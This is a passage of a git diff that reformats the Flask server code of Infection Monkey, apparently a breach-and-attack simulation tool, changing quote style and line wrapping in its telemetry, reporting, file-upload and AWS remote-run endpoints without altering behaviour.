a/monkey/monkey_island/cc/resources/netmap.py +++ b/monkey/monkey_island/cc/resources/netmap.py @@ -4,7 +4,7 @@ from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.netmap.net_edge import NetEdgeService from monkey_island.cc.services.netmap.net_node import NetNodeService -__author__ = 'Barak' +__author__ = "Barak" class NetMap(flask_restful.Resource): @@ -13,8 +13,4 @@ class NetMap(flask_restful.Resource): net_nodes = NetNodeService.get_all_net_nodes() net_edges = NetEdgeService.get_all_net_edges() - return \ - { - "nodes": net_nodes, - "edges": net_edges - } + return {"nodes": net_nodes, "edges": net_edges} diff --git a/monkey/monkey_island/cc/resources/node.py b/monkey/monkey_island/cc/resources/node.py index ff630b9a4..ffaadaec9 100644 --- a/monkey/monkey_island/cc/resources/node.py +++ b/monkey/monkey_island/cc/resources/node.py @@ -4,13 +4,13 @@ from flask import request from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.node import NodeService -__author__ = 'Barak' +__author__ = "Barak" class Node(flask_restful.Resource): @jwt_required def get(self): - node_id = request.args.get('id') + node_id = request.args.get("id") if node_id: return NodeService.get_displayed_node_by_id(node_id) diff --git a/monkey/monkey_island/cc/resources/node_states.py b/monkey/monkey_island/cc/resources/node_states.py index 87be11ab5..073aafffd 100644 --- a/monkey/monkey_island/cc/resources/node_states.py +++ b/monkey/monkey_island/cc/resources/node_states.py @@ -7,4 +7,4 @@ from monkey_island.cc.services.utils.node_states import NodeStates as NodeStateL 
class NodeStates(flask_restful.Resource): @jwt_required def get(self): - return {'node_states': [state.value for state in NodeStateList]} + return {"node_states": [state.value for state in NodeStateList]} diff --git a/monkey/monkey_island/cc/resources/pba_file_download.py b/monkey/monkey_island/cc/resources/pba_file_download.py index 4fe05c98f..aa5465b0d 100644 --- a/monkey/monkey_island/cc/resources/pba_file_download.py +++ b/monkey/monkey_island/cc/resources/pba_file_download.py @@ -3,7 +3,7 @@ from flask import send_from_directory from monkey_island.cc.services.post_breach_files import ABS_UPLOAD_PATH -__author__ = 'VakarisZ' +__author__ = "VakarisZ" class PBAFileDownload(flask_restful.Resource): diff --git a/monkey/monkey_island/cc/resources/pba_file_upload.py b/monkey/monkey_island/cc/resources/pba_file_upload.py index 6d6795f74..36f138f10 100644 --- a/monkey/monkey_island/cc/resources/pba_file_upload.py +++ b/monkey/monkey_island/cc/resources/pba_file_upload.py @@ -8,21 +8,25 @@ from werkzeug.utils import secure_filename from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.config import ConfigService -from monkey_island.cc.services.post_breach_files import (ABS_UPLOAD_PATH, PBA_LINUX_FILENAME_PATH, - PBA_WINDOWS_FILENAME_PATH) +from monkey_island.cc.services.post_breach_files import ( + ABS_UPLOAD_PATH, + PBA_LINUX_FILENAME_PATH, + PBA_WINDOWS_FILENAME_PATH, +) -__author__ = 'VakarisZ' +__author__ = "VakarisZ" LOG = logging.getLogger(__name__) # Front end uses these strings to identify which files to work with (linux of windows) -LINUX_PBA_TYPE = 'PBAlinux' -WINDOWS_PBA_TYPE = 'PBAwindows' +LINUX_PBA_TYPE = "PBAlinux" +WINDOWS_PBA_TYPE = "PBAwindows" class FileUpload(flask_restful.Resource): """ File upload endpoint used to exchange files with filepond component on the front-end """ + def __init__(self): # Create all directories on the way if they don't exist ABS_UPLOAD_PATH.mkdir(parents=True, exist_ok=True) @@ -50,9 +54,7 @@ class FileUpload(flask_restful.Resource): """ filename = FileUpload.upload_pba_file(request, (file_type == LINUX_PBA_TYPE)) - response = Response( - response=filename, - status=200, mimetype='text/plain') + response = Response(response=filename, status=200, mimetype="text/plain") return response @jwt_required @@ -62,13 +64,15 @@ class FileUpload(flask_restful.Resource): :param file_type: Type indicates which file was deleted, linux of windows :return: Empty response """ - filename_path = PBA_LINUX_FILENAME_PATH if file_type == 'PBAlinux' else PBA_WINDOWS_FILENAME_PATH + filename_path = ( + PBA_LINUX_FILENAME_PATH if file_type == "PBAlinux" else PBA_WINDOWS_FILENAME_PATH + ) filename = ConfigService.get_config_value(filename_path) file_path = ABS_UPLOAD_PATH.joinpath(filename) try: if os.path.exists(file_path): os.remove(file_path) - ConfigService.set_config_value(filename_path, '') + ConfigService.set_config_value(filename_path, "") except OSError as e: LOG.error("Can't remove previously uploaded post breach files: %s" % e) @@ -82,8 +86,10 @@ class FileUpload(flask_restful.Resource): :param is_linux: Boolean indicating if this file is for windows or for linux :return: filename string """ - filename = secure_filename(request_.files['filepond'].filename) + filename = secure_filename(request_.files["filepond"].filename) file_path = ABS_UPLOAD_PATH.joinpath(filename).absolute() - request_.files['filepond'].save(str(file_path)) - ConfigService.set_config_value((PBA_LINUX_FILENAME_PATH if is_linux else 
PBA_WINDOWS_FILENAME_PATH), filename) + request_.files["filepond"].save(str(file_path)) + ConfigService.set_config_value( + (PBA_LINUX_FILENAME_PATH if is_linux else PBA_WINDOWS_FILENAME_PATH), filename + ) return filename diff --git a/monkey/monkey_island/cc/resources/remote_run.py b/monkey/monkey_island/cc/resources/remote_run.py index 0e80f25c0..0e6e6df10 100644 --- a/monkey/monkey_island/cc/resources/remote_run.py +++ b/monkey/monkey_island/cc/resources/remote_run.py @@ -8,10 +8,14 @@ from common.cloud.aws.aws_service import AwsService from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService -CLIENT_ERROR_FORMAT = "ClientError, error message: '{}'. Probably, the IAM role that has been associated with the " \ - "instance doesn't permit SSM calls. " -NO_CREDS_ERROR_FORMAT = "NoCredentialsError, error message: '{}'. Probably, no IAM role has been associated with the " \ - "instance. " +CLIENT_ERROR_FORMAT = ( + "ClientError, error message: '{}'. Probably, the IAM role that has been associated with the " + "instance doesn't permit SSM calls. " +) +NO_CREDS_ERROR_FORMAT = ( + "NoCredentialsError, error message: '{}'. Probably, no IAM role has been associated with the " + "instance. " +) class RemoteRun(flask_restful.Resource): @@ -20,24 +24,24 @@ class RemoteRun(flask_restful.Resource): RemoteRunAwsService.init() def run_aws_monkeys(self, request_body): - instances = request_body.get('instances') - island_ip = request_body.get('island_ip') + instances = request_body.get("instances") + island_ip = request_body.get("island_ip") return RemoteRunAwsService.run_aws_monkeys(instances, island_ip) @jwt_required def get(self): - action = request.args.get('action') - if action == 'list_aws': + action = request.args.get("action") + if action == "list_aws": is_aws = RemoteRunAwsService.is_running_on_aws() - resp = {'is_aws': is_aws} + resp = {"is_aws": is_aws} if is_aws: try: - resp['instances'] = AwsService.get_instances() + resp["instances"] = AwsService.get_instances() except NoCredentialsError as e: - resp['error'] = NO_CREDS_ERROR_FORMAT.format(e) + resp["error"] = NO_CREDS_ERROR_FORMAT.format(e) return jsonify(resp) except ClientError as e: - resp['error'] = CLIENT_ERROR_FORMAT.format(e) + resp["error"] = CLIENT_ERROR_FORMAT.format(e) return jsonify(resp) return jsonify(resp) @@ -47,11 +51,11 @@ class RemoteRun(flask_restful.Resource): def post(self): body = json.loads(request.data) resp = {} - if body.get('type') == 'aws': + if body.get("type") == "aws": RemoteRunAwsService.update_aws_region_authless() result = self.run_aws_monkeys(body) - resp['result'] = result + resp["result"] = result return jsonify(resp) # default action - return make_response({'error': 'Invalid action'}, 500) + return make_response({"error": "Invalid action"}, 500) diff --git a/monkey/monkey_island/cc/resources/root.py b/monkey/monkey_island/cc/resources/root.py index 041d38b5e..b7fc53d60 100644 --- a/monkey/monkey_island/cc/resources/root.py +++ b/monkey/monkey_island/cc/resources/root.py @@ -10,7 +10,7 @@ from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.database import Database from monkey_island.cc.services.infection_lifecycle import InfectionLifecycle -__author__ = 'Barak' +__author__ = "Barak" logger = logging.getLogger(__name__) @@ -21,7 +21,7 @@ class Root(flask_restful.Resource): def get(self, action=None): if not action: - action = request.args.get('action') + action = 
request.args.get("action") if not action: return self.get_server_info() @@ -30,13 +30,14 @@ class Root(flask_restful.Resource): elif action == "killall": return jwt_required(InfectionLifecycle.kill_all)() elif action == "is-up": - return {'is-up': True} + return {"is-up": True} else: - return make_response(400, {'error': 'unknown action'}) + return make_response(400, {"error": "unknown action"}) @jwt_required def get_server_info(self): return jsonify( ip_addresses=local_ip_addresses(), mongo=str(mongo.db), - completed_steps=InfectionLifecycle.get_completed_steps()) + completed_steps=InfectionLifecycle.get_completed_steps(), + ) diff --git a/monkey/monkey_island/cc/resources/security_report.py b/monkey/monkey_island/cc/resources/security_report.py index db434d616..b2ce0704e 100644 --- a/monkey/monkey_island/cc/resources/security_report.py +++ b/monkey/monkey_island/cc/resources/security_report.py @@ -5,7 +5,6 @@ from monkey_island.cc.services.reporting.report import ReportService class SecurityReport(flask_restful.Resource): - @jwt_required def get(self): return ReportService.get_report() diff --git a/monkey/monkey_island/cc/resources/telemetry.py b/monkey/monkey_island/cc/resources/telemetry.py index 75feb20a4..9bf2f7dda 100644 --- a/monkey/monkey_island/cc/resources/telemetry.py +++ b/monkey/monkey_island/cc/resources/telemetry.py @@ -14,7 +14,7 @@ from monkey_island.cc.resources.test.utils.telem_store import TestTelemStore from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.telemetry.processing.processing import process_telemetry -__author__ = 'Barak' +__author__ = "Barak" logger = logging.getLogger(__name__) @@ -22,37 +22,42 @@ logger = logging.getLogger(__name__) class Telemetry(flask_restful.Resource): @jwt_required def get(self, **kw): - monkey_guid = request.args.get('monkey_guid') - telem_category = request.args.get('telem_category') - timestamp = request.args.get('timestamp') + monkey_guid = request.args.get("monkey_guid") + telem_category = request.args.get("telem_category") + timestamp = request.args.get("timestamp") if "null" == timestamp: # special case to avoid ugly JS code... timestamp = None - result = {'timestamp': datetime.now().isoformat()} + result = {"timestamp": datetime.now().isoformat()} find_filter = {} if monkey_guid: - find_filter["monkey_guid"] = {'$eq': monkey_guid} + find_filter["monkey_guid"] = {"$eq": monkey_guid} if telem_category: - find_filter["telem_category"] = {'$eq': telem_category} + find_filter["telem_category"] = {"$eq": telem_category} if timestamp: - find_filter['timestamp'] = {'$gt': dateutil.parser.parse(timestamp)} + find_filter["timestamp"] = {"$gt": dateutil.parser.parse(timestamp)} - result['objects'] = self.telemetry_to_displayed_telemetry(mongo.db.telemetry.find(find_filter)) + result["objects"] = self.telemetry_to_displayed_telemetry( + mongo.db.telemetry.find(find_filter) + ) return result # Used by monkey. can't secure. @TestTelemStore.store_test_telem def post(self): telemetry_json = json.loads(request.data) - telemetry_json['data'] = json.loads(telemetry_json['data']) - telemetry_json['timestamp'] = datetime.now() - telemetry_json['command_control_channel'] = {'src': request.remote_addr, 'dst': request.host} + telemetry_json["data"] = json.loads(telemetry_json["data"]) + telemetry_json["timestamp"] = datetime.now() + telemetry_json["command_control_channel"] = { + "src": request.remote_addr, + "dst": request.host, + } # Monkey communicated, so it's alive. Update the TTL. 
- Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']).renew_ttl() + Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]).renew_ttl() - monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']) + monkey = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"]) NodeService.update_monkey_modify_time(monkey["_id"]) process_telemetry(telemetry_json) @@ -75,10 +80,10 @@ class Telemetry(flask_restful.Resource): monkey_label = telem_monkey_guid x["monkey"] = monkey_label objects.append(x) - if x['telem_category'] == TelemCategoryEnum.SYSTEM_INFO and 'credentials' in x['data']: - for user in x['data']['credentials']: - if -1 != user.find(','): - new_user = user.replace(',', '.') - x['data']['credentials'][new_user] = x['data']['credentials'].pop(user) + if x["telem_category"] == TelemCategoryEnum.SYSTEM_INFO and "credentials" in x["data"]: + for user in x["data"]["credentials"]: + if -1 != user.find(","): + new_user = user.replace(",", ".") + x["data"]["credentials"][new_user] = x["data"]["credentials"].pop(user) return objects diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py index 3da328b99..4a2972cdb 100644 --- a/monkey/monkey_island/cc/resources/telemetry_feed.py +++ b/monkey/monkey_island/cc/resources/telemetry_feed.py @@ -13,45 +13,50 @@ from monkey_island.cc.services.node import NodeService logger = logging.getLogger(__name__) -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class TelemetryFeed(flask_restful.Resource): @jwt_required def get(self, **kw): - timestamp = request.args.get('timestamp') + timestamp = request.args.get("timestamp") if "null" == timestamp or timestamp is None: # special case to avoid ugly JS code... telemetries = mongo.db.telemetry.find({}) else: - telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) - telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) + telemetries = mongo.db.telemetry.find( + {"timestamp": {"$gt": dateutil.parser.parse(timestamp)}} + ) + telemetries = telemetries.sort([("timestamp", flask_pymongo.ASCENDING)]) try: - return \ - { - 'telemetries': [TelemetryFeed.get_displayed_telemetry(telem) for telem in telemetries - if TelemetryFeed.should_show_brief(telem)], - 'timestamp': datetime.now().isoformat() - } + return { + "telemetries": [ + TelemetryFeed.get_displayed_telemetry(telem) + for telem in telemetries + if TelemetryFeed.should_show_brief(telem) + ], + "timestamp": datetime.now().isoformat(), + } except KeyError as err: logger.error("Failed parsing telemetries. 
Error: {0}.".format(err)) - return {'telemetries': [], 'timestamp': datetime.now().isoformat()} + return {"telemetries": [], "timestamp": datetime.now().isoformat()} @staticmethod def get_displayed_telemetry(telem): - monkey = NodeService.get_monkey_by_guid(telem['monkey_guid']) - default_hostname = "GUID-" + telem['monkey_guid'] - return \ - { - 'id': telem['_id'], - 'timestamp': telem['timestamp'].strftime('%d/%m/%Y %H:%M:%S'), - 'hostname': monkey.get('hostname', default_hostname) if monkey else default_hostname, - 'brief': TelemetryFeed.get_telem_brief(telem) - } + monkey = NodeService.get_monkey_by_guid(telem["monkey_guid"]) + default_hostname = "GUID-" + telem["monkey_guid"] + return { + "id": telem["_id"], + "timestamp": telem["timestamp"].strftime("%d/%m/%Y %H:%M:%S"), + "hostname": monkey.get("hostname", default_hostname) if monkey else default_hostname, + "brief": TelemetryFeed.get_telem_brief(telem), + } @staticmethod def get_telem_brief(telem): - telem_brief_parser = TelemetryFeed.get_telem_brief_parser_by_category(telem['telem_category']) + telem_brief_parser = TelemetryFeed.get_telem_brief_parser_by_category( + telem["telem_category"] + ) return telem_brief_parser(telem) @staticmethod @@ -60,61 +65,62 @@ class TelemetryFeed(flask_restful.Resource): @staticmethod def get_tunnel_telem_brief(telem): - tunnel = telem['data']['proxy'] + tunnel = telem["data"]["proxy"] if tunnel is None: - return 'No tunnel is used.' + return "No tunnel is used." else: tunnel_host_ip = tunnel.split(":")[-2].replace("//", "") - tunnel_host = NodeService.get_monkey_by_ip(tunnel_host_ip)['hostname'] - return 'Tunnel set up to machine: %s.' % tunnel_host + tunnel_host = NodeService.get_monkey_by_ip(tunnel_host_ip)["hostname"] + return "Tunnel set up to machine: %s." % tunnel_host @staticmethod def get_state_telem_brief(telem): - if telem['data']['done']: - return '''Monkey finishing its execution.''' + if telem["data"]["done"]: + return """Monkey finishing its execution.""" else: - return 'Monkey started.' + return "Monkey started." @staticmethod def get_exploit_telem_brief(telem): - target = telem['data']['machine']['ip_addr'] - exploiter = telem['data']['exploiter'] - result = telem['data']['result'] + target = telem["data"]["machine"]["ip_addr"] + exploiter = telem["data"]["exploiter"] + result = telem["data"]["result"] if result: - return 'Monkey successfully exploited %s using the %s exploiter.' % (target, exploiter) + return "Monkey successfully exploited %s using the %s exploiter." % (target, exploiter) else: - return 'Monkey failed exploiting %s using the %s exploiter.' % (target, exploiter) + return "Monkey failed exploiting %s using the %s exploiter." % (target, exploiter) @staticmethod def get_scan_telem_brief(telem): - return 'Monkey discovered machine %s.' % telem['data']['machine']['ip_addr'] + return "Monkey discovered machine %s." % telem["data"]["machine"]["ip_addr"] @staticmethod def get_systeminfo_telem_brief(telem): - return 'Monkey collected system information.' + return "Monkey collected system information." @staticmethod def get_trace_telem_brief(telem): - return 'Trace: %s' % telem['data']['msg'] + return "Trace: %s" % telem["data"]["msg"] @staticmethod def get_post_breach_telem_brief(telem): - return '%s post breach action executed on %s (%s) machine.' % (telem['data'][0]['name'], - telem['data'][0]['hostname'], - telem['data'][0]['ip']) + return "%s post breach action executed on %s (%s) machine." 
% ( + telem["data"][0]["name"], + telem["data"][0]["hostname"], + telem["data"][0]["ip"], + ) @staticmethod def should_show_brief(telem): - return telem['telem_category'] in TELEM_PROCESS_DICT + return telem["telem_category"] in TELEM_PROCESS_DICT -TELEM_PROCESS_DICT = \ - { - TelemCategoryEnum.TUNNEL: TelemetryFeed.get_tunnel_telem_brief, - TelemCategoryEnum.STATE: TelemetryFeed.get_state_telem_brief, - TelemCategoryEnum.EXPLOIT: TelemetryFeed.get_exploit_telem_brief, - TelemCategoryEnum.SCAN: TelemetryFeed.get_scan_telem_brief, - TelemCategoryEnum.SYSTEM_INFO: TelemetryFeed.get_systeminfo_telem_brief, - TelemCategoryEnum.TRACE: TelemetryFeed.get_trace_telem_brief, - TelemCategoryEnum.POST_BREACH: TelemetryFeed.get_post_breach_telem_brief - } +TELEM_PROCESS_DICT = { + TelemCategoryEnum.TUNNEL: TelemetryFeed.get_tunnel_telem_brief, + TelemCategoryEnum.STATE: TelemetryFeed.get_state_telem_brief, + TelemCategoryEnum.EXPLOIT: TelemetryFeed.get_exploit_telem_brief, + TelemCategoryEnum.SCAN: TelemetryFeed.get_scan_telem_brief, + TelemCategoryEnum.SYSTEM_INFO: TelemetryFeed.get_systeminfo_telem_brief, + TelemCategoryEnum.TRACE: TelemetryFeed.get_trace_telem_brief, + TelemCategoryEnum.POST_BREACH: TelemetryFeed.get_post_breach_telem_brief, +} diff --git a/monkey/monkey_island/cc/resources/test/clear_caches.py b/monkey/monkey_island/cc/resources/test/clear_caches.py index 34401b318..04c6b31d8 100644 --- a/monkey/monkey_island/cc/resources/test/clear_caches.py +++ b/monkey/monkey_island/cc/resources/test/clear_caches.py @@ -17,6 +17,7 @@ class ClearCaches(flask_restful.Resource): so we use this to clear the caches. :note: DO NOT CALL THIS IN PRODUCTION CODE as this will slow down the user experience. """ + @jwt_required def get(self, **kw): try: diff --git a/monkey/monkey_island/cc/resources/test/log_test.py b/monkey/monkey_island/cc/resources/test/log_test.py index a9c4f8b62..c6ec50f71 100644 --- a/monkey/monkey_island/cc/resources/test/log_test.py +++ b/monkey/monkey_island/cc/resources/test/log_test.py @@ -9,9 +9,9 @@ from monkey_island.cc.resources.auth.auth import jwt_required class LogTest(flask_restful.Resource): @jwt_required def get(self): - find_query = json_util.loads(request.args.get('find_query')) + find_query = json_util.loads(request.args.get("find_query")) log = mongo.db.log.find_one(find_query) if not log: - return {'results': None} - log_file = database.gridfs.get(log['file_id']) - return {'results': log_file.read().decode()} + return {"results": None} + log_file = database.gridfs.get(log["file_id"]) + return {"results": log_file.read().decode()} diff --git a/monkey/monkey_island/cc/resources/test/monkey_test.py b/monkey/monkey_island/cc/resources/test/monkey_test.py index da8333479..1122141d2 100644 --- a/monkey/monkey_island/cc/resources/test/monkey_test.py +++ b/monkey/monkey_island/cc/resources/test/monkey_test.py @@ -9,5 +9,5 @@ from monkey_island.cc.resources.auth.auth import jwt_required class MonkeyTest(flask_restful.Resource): @jwt_required def get(self, **kw): - find_query = json_util.loads(request.args.get('find_query')) - return {'results': list(mongo.db.monkey.find(find_query))} + find_query = json_util.loads(request.args.get("find_query")) + return {"results": list(mongo.db.monkey.find(find_query))} diff --git a/monkey/monkey_island/cc/resources/test/telemetry_test.py b/monkey/monkey_island/cc/resources/test/telemetry_test.py index 29108070e..54be08d71 100644 --- a/monkey/monkey_island/cc/resources/test/telemetry_test.py +++ 
b/monkey/monkey_island/cc/resources/test/telemetry_test.py @@ -9,5 +9,5 @@ from monkey_island.cc.resources.auth.auth import jwt_required class TelemetryTest(flask_restful.Resource): @jwt_required def get(self, **kw): - find_query = json_util.loads(request.args.get('find_query')) - return {'results': list(mongo.db.telemetry.find(find_query))} + find_query = json_util.loads(request.args.get("find_query")) + return {"results": list(mongo.db.telemetry.find(find_query))} diff --git a/monkey/monkey_island/cc/resources/test/utils/telem_store.py b/monkey/monkey_island/cc/resources/test/utils/telem_store.py index 707140c9e..5920c8da3 100644 --- a/monkey/monkey_island/cc/resources/test/utils/telem_store.py +++ b/monkey/monkey_island/cc/resources/test/utils/telem_store.py @@ -30,8 +30,16 @@ class TestTelemStore: method = request.method content = request.data.decode() endpoint = request.path - name = str(request.url_rule).replace('/', '_').replace('<', '_').replace('>', '_').replace(':', '_') - TestTelem(name=name, method=method, endpoint=endpoint, content=content, time=time).save() + name = ( + str(request.url_rule) + .replace("/", "_") + .replace("<", "_") + .replace(">", "_") + .replace(":", "_") + ) + TestTelem( + name=name, method=method, endpoint=endpoint, content=content, time=time + ).save() return f(*args, **kwargs) return decorated_function @@ -46,7 +54,10 @@ class TestTelemStore: shutil.rmtree(TELEM_SAMPLE_DIR) mkdir(TELEM_SAMPLE_DIR) for test_telem in TestTelem.objects(): - with open(TestTelemStore.get_unique_file_path_for_test_telem(TELEM_SAMPLE_DIR, test_telem), 'w') as file: + with open( + TestTelemStore.get_unique_file_path_for_test_telem(TELEM_SAMPLE_DIR, test_telem), + "w", + ) as file: file.write(test_telem.to_json(indent=2)) TestTelemStore.TELEMS_EXPORTED = True logger.info("Telemetries exported!") @@ -59,13 +70,15 @@ class TestTelemStore: if path.exists(potential_filepath): continue return potential_filepath - raise Exception(f"Too many telemetries of the same category. Max amount {MAX_SAME_CATEGORY_TELEMS}") + raise Exception( + f"Too many telemetries of the same category. 
Max amount {MAX_SAME_CATEGORY_TELEMS}" + ) @staticmethod def _get_filename_by_test_telem(test_telem: TestTelem): endpoint_part = test_telem.name - return endpoint_part + '_' + test_telem.method + return endpoint_part + "_" + test_telem.method -if __name__ == '__main__': +if __name__ == "__main__": TestTelemStore.export_test_telems() diff --git a/monkey/monkey_island/cc/resources/version_update.py b/monkey/monkey_island/cc/resources/version_update.py index 4c2eca1e3..87aa96153 100644 --- a/monkey/monkey_island/cc/resources/version_update.py +++ b/monkey/monkey_island/cc/resources/version_update.py @@ -5,7 +5,7 @@ import flask_restful from common.version import get_version from monkey_island.cc.services.version_update import VersionUpdateService -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" logger = logging.getLogger(__name__) @@ -18,7 +18,7 @@ class VersionUpdate(flask_restful.Resource): # even when not authenticated def get(self): return { - 'current_version': get_version(), - 'newer_version': VersionUpdateService.get_newer_version(), - 'download_link': VersionUpdateService.get_download_link() + "current_version": get_version(), + "newer_version": VersionUpdateService.get_newer_version(), + "download_link": VersionUpdateService.get_download_link(), } diff --git a/monkey/monkey_island/cc/resources/zero_trust/finding_event.py b/monkey/monkey_island/cc/resources/zero_trust/finding_event.py index ddef04b77..ce99390da 100644 --- a/monkey/monkey_island/cc/resources/zero_trust/finding_event.py +++ b/monkey/monkey_island/cc/resources/zero_trust/finding_event.py @@ -3,11 +3,16 @@ import json import flask_restful from monkey_island.cc.resources.auth.auth import jwt_required -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) class ZeroTrustFindingEvent(flask_restful.Resource): - @jwt_required def get(self, finding_id: str): - return {'events_json': json.dumps(MonkeyZTFindingService.get_events_by_finding(finding_id), default=str)} + return { + "events_json": json.dumps( + MonkeyZTFindingService.get_events_by_finding(finding_id), default=str + ) + } diff --git a/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/aws_keys.py b/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/aws_keys.py index 53e757f11..174e02843 100644 --- a/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/aws_keys.py +++ b/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/aws_keys.py @@ -5,7 +5,6 @@ from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_auth_service imp class AWSKeys(flask_restful.Resource): - @jwt_required def get(self): return get_aws_keys() diff --git a/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py b/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py index dbed4dd51..5197b1972 100644 --- a/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py +++ b/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py @@ -6,29 +6,32 @@ from flask import request from common.cloud.scoutsuite_consts import CloudProviders from common.utils.exceptions import InvalidAWSKeys from monkey_island.cc.resources.auth.auth import jwt_required -from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_auth_service import (is_cloud_authentication_setup, - set_aws_keys) +from 
monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_auth_service import ( + is_cloud_authentication_setup, + set_aws_keys, +) class ScoutSuiteAuth(flask_restful.Resource): - @jwt_required def get(self, provider: CloudProviders): if provider == CloudProviders.AWS.value: is_setup, message = is_cloud_authentication_setup(provider) - return {'is_setup': is_setup, 'message': message} + return {"is_setup": is_setup, "message": message} else: - return {'is_setup': False, 'message': ''} + return {"is_setup": False, "message": ""} @jwt_required def post(self, provider: CloudProviders): key_info = json.loads(request.data) - error_msg = '' + error_msg = "" if provider == CloudProviders.AWS.value: try: - set_aws_keys(access_key_id=key_info['accessKeyId'], - secret_access_key=key_info['secretAccessKey'], - session_token=key_info['sessionToken']) + set_aws_keys( + access_key_id=key_info["accessKeyId"], + secret_access_key=key_info["secretAccessKey"], + session_token=key_info["sessionToken"], + ) except InvalidAWSKeys as e: error_msg = str(e) - return {'error_msg': error_msg} + return {"error_msg": error_msg} diff --git a/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py b/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py index 433bf4631..8b3ce9419 100644 --- a/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py +++ b/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py @@ -6,8 +6,12 @@ from flask import Response, jsonify from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.zero_trust.zero_trust_report.finding_service import FindingService from monkey_island.cc.services.zero_trust.zero_trust_report.pillar_service import PillarService -from monkey_island.cc.services.zero_trust.zero_trust_report.principle_service import PrincipleService -from monkey_island.cc.services.zero_trust.zero_trust_report.scoutsuite_raw_data_service import ScoutSuiteRawDataService +from monkey_island.cc.services.zero_trust.zero_trust_report.principle_service import ( + PrincipleService, +) +from monkey_island.cc.services.zero_trust.zero_trust_report.scoutsuite_raw_data_service import ( + ScoutSuiteRawDataService, +) REPORT_DATA_PILLARS = "pillars" REPORT_DATA_FINDINGS = "findings" @@ -16,7 +20,6 @@ REPORT_DATA_SCOUTSUITE = "scoutsuite" class ZeroTrustReport(flask_restful.Resource): - @jwt_required def get(self, report_data=None): if report_data == REPORT_DATA_PILLARS: @@ -27,7 +30,8 @@ class ZeroTrustReport(flask_restful.Resource): return jsonify(FindingService.get_all_findings_for_ui()) elif report_data == REPORT_DATA_SCOUTSUITE: # Raw ScoutSuite data is already solved as json, no need to jsonify - return Response(ScoutSuiteRawDataService.get_scoutsuite_data_json(), - mimetype='application/json') + return Response( + ScoutSuiteRawDataService.get_scoutsuite_data_json(), mimetype="application/json" + ) flask_restful.abort(http.client.NOT_FOUND) diff --git a/monkey/monkey_island/cc/server_utils/bootloader_server.py b/monkey/monkey_island/cc/server_utils/bootloader_server.py index fbbd32815..1532f1a8d 100644 --- a/monkey/monkey_island/cc/server_utils/bootloader_server.py +++ b/monkey/monkey_island/cc/server_utils/bootloader_server.py @@ -16,27 +16,26 @@ logger = logging.getLogger(__name__) class BootloaderHttpServer(ThreadingMixIn, HTTPServer): - def __init__(self, mongo_url): self.mongo_client = pymongo.MongoClient(mongo_url) - server_address = ('', 5001) + server_address = ("", 5001) super().__init__(server_address, 
BootloaderHTTPRequestHandler) class BootloaderHTTPRequestHandler(BaseHTTPRequestHandler): - def do_POST(self): - content_length = int(self.headers['Content-Length']) + content_length = int(self.headers["Content-Length"]) post_data = self.rfile.read(content_length).decode() - island_server_path = BootloaderHTTPRequestHandler.get_bootloader_resource_url(self.request.getsockname()[0]) + island_server_path = BootloaderHTTPRequestHandler.get_bootloader_resource_url( + self.request.getsockname()[0] + ) island_server_path = parse.urljoin(island_server_path, self.path[1:]) # The island server doesn't always have a correct SSL cert installed # (By default it comes with a self signed one), # that's why we're not verifying the cert in this request. - r = requests.post(url=island_server_path, - data=post_data, - verify=False, - timeout=SHORT_REQUEST_TIMEOUT) # noqa: DUO123 + r = requests.post( + url=island_server_path, data=post_data, verify=False, timeout=SHORT_REQUEST_TIMEOUT + ) # noqa: DUO123 try: if r.status_code != 200: diff --git a/monkey/monkey_island/cc/server_utils/consts.py b/monkey/monkey_island/cc/server_utils/consts.py index 5a0e69581..67c7209eb 100644 --- a/monkey/monkey_island/cc/server_utils/consts.py +++ b/monkey/monkey_island/cc/server_utils/consts.py @@ -5,9 +5,7 @@ __author__ = "itay.mizeretz" MONKEY_ISLAND_ABS_PATH = os.path.join(os.getcwd(), "monkey_island") DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS = 60 * 5 -DEFAULT_SERVER_CONFIG_PATH = os.path.join( - MONKEY_ISLAND_ABS_PATH, "cc", "server_config.json" -) +DEFAULT_SERVER_CONFIG_PATH = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "server_config.json") DEFAULT_DEVELOP_SERVER_CONFIG_PATH = os.path.join( MONKEY_ISLAND_ABS_PATH, "cc", "server_config.json.develop" diff --git 